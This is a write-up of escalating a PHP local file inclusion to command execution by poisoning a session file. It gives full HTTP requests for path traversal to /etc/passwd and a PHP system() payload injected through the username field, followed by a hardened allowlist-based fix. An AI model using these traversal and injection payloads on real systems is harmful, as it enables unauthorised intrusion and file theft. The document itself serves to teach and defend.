A simple file inclusion:

```http
POST /upload/? HTTP/1.1
Host: vulnerable.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Connection: close
Upgrade-Insecure-Requests: 1

login=1&user=admin&pass=admin&lang=en_us.php
```
Some login pages take a parameter that selects the language, such as the lang parameter above.
```http
POST /upload/? HTTP/1.1
Host: vulnerable.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Connection: close
Upgrade-Insecure-Requests: 1

login=1&user=admin&pass=admin&lang=../../../../../../../../../../etc/passwd
```
By repeatedly trying different numbers of parent-directory steps, /etc/passwd was successfully included, and its contents can be seen in the response.
Common ways to escalate from LFI to RCE

Once a local file inclusion has been found, one can try to turn it into remote command execution.
Possible techniques include:
- Using a file upload form/function
- expect://cmd
- php://file
- php://filter
- input://stream
- data://text/plain;base64,command
- /proc/self/environ
- /proc/self/fd
- Some controllable log files, such as:
  - /var/log/apache/access.log
  - /var/log/apache/error.log
  - /var/log/vsftpd.log
  - /var/log/sshd.log
  - /var/log/mail

Any of these may also fail.
Achieving RCE by controlling the PHP session

When this application is given a wrong username and password such as admin and the login fails,
it returns several Set-Cookie headers; the PHP session value carried in the request is likely stored on the server side.

```http
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
Set-Cookie: pass=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```

PHP 5 stores session files at /var/lib/php5/sess_[PHPSESSID] by default,
so the session above should be stored at
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
So first, try including the session file:
```http
POST /upload/? HTTP/1.1
Host: vulnerable.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27
Content-Length: 107
Connection: close
Upgrade-Insecure-Requests: 1

login=1&user=admin&pass=admin&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
```
Response:

```
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
```

Clearly, we can enter PHP code in the user parameter.
```http
POST /upload/? HTTP/1.1
Host: vulnerable.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27
Content-Length: 134
Connection: close
Upgrade-Insecure-Requests: 1

login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
```
As a result, the content is written into the Set-Cookie header and also into the session file:

```http
Set-Cookie:user=%3C%3Fphp+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E;expires=Mon, 13-Aug-2018 20:40:53 GMT; path=/; httponly
```

The session file can then be read again via the LFI. Note that the cookie must be removed from the request; otherwise the session file is overwritten and the read fails.
```http
POST /upload/? HTTP/1.1
Host: vulnerable.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Connection: close
Upgrade-Insecure-Requests: 1

login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
```

This results in command execution.
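The writeup relies on two defects in the login page: the lang parameter is passed straight to include, and whatever is sent in user is serialized verbatim into the sess_ file on disk. The original post does not show the application's code, so the following PHP (an added example, not the post's or the application's own code; the vulnerable shape, the lang/ directory, the file names and the username pattern are assumptions) sketches that pattern beside a hardened version that closes both the traversal and the session-poisoning path:

```php
<?php
// Added example, not from the original post. PHP 7.1+ (nullable return types).
//
// Assumed vulnerable shape of the login page (what the writeup exploits):
//     include($_POST['lang']);             // traversal to /etc/passwd, sess_ file
//     $_SESSION['user'] = $_POST['user'];  // raw input is serialized to disk
// Anything written to the session becomes text in sess_<PHPSESSID>, which the
// include above can later load as PHP. The hardened version below fixes both.

session_start();

// 1. Allowlist: map a short key to a fixed file; never build a path from input.
const LANG_FILES = [
    'en_us' => 'en_us.php',   // assumed language bundle names
    'zh_cn' => 'zh_cn.php',
];

/**
 * Return the absolute path of an allowlisted language file, or null to refuse.
 * Defence in depth: even an allowlisted name must resolve inside $langDir.
 */
function resolveLangFile(string $lang, string $langDir): ?string
{
    if (!isset(LANG_FILES[$lang])) {
        return null;                                   // unknown key: refuse
    }
    $base = realpath($langDir);
    $path = realpath($langDir . '/' . LANG_FILES[$lang]);
    if ($base === false || $path === false) {
        return null;                                   // missing dir or file
    }
    // The resolved file must sit strictly below the language directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$lang = $_POST['lang'] ?? 'en_us';
$file = resolveLangFile($lang, __DIR__ . '/lang');   // assumed location
if ($file === null) {
    http_response_code(400);
    exit('unsupported language');
}
include $file;

// 2. Only validated values reach the session, so sess_<id> never carries
//    attacker-chosen text such as "<?php ...". The password is never stored.
$user = $_POST['user'] ?? '';
if (preg_match('/^[A-Za-z0-9_.-]{1,32}$/', $user) !== 1) {   // assumed policy
    http_response_code(400);
    exit('invalid username');
}
$_SESSION['user'] = $user;
$_SESSION['lang'] = $lang;   // the allowlist key, not a file name
```

On the configuration side, allow_url_include=Off stops include from reading data:// and php://input, but it does not block php://filter or plain local paths such as the session and log files listed above, and changing session.save_path only moves the sess_ file rather than putting it out of reach of a traversal. The allowlisted include is the fix; the session hygiene removes the second half of the chain in case another inclusion primitive exists.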